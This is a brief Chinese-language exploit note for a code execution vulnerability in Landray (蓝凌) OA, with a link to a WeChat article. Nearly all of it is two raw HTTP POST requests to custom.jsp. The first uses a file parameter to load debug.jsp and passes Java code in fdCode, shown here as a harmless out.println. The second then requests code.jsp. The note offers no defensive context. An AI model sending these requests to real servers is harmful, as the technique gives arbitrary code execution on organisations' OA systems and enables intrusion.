蓝凌 OA debug.jsp 代码执行漏洞
https://mp.weixin.qq.com/s/0xu7K726hp1xfnShhjGbVQ
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
var={"body":{"file":"/sys/common/debug.jsp"}}&fdCode=out.println("Hello world");然后再访问code.jsp
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
var={"body":{"file":"/sys/common/code.jsp"}}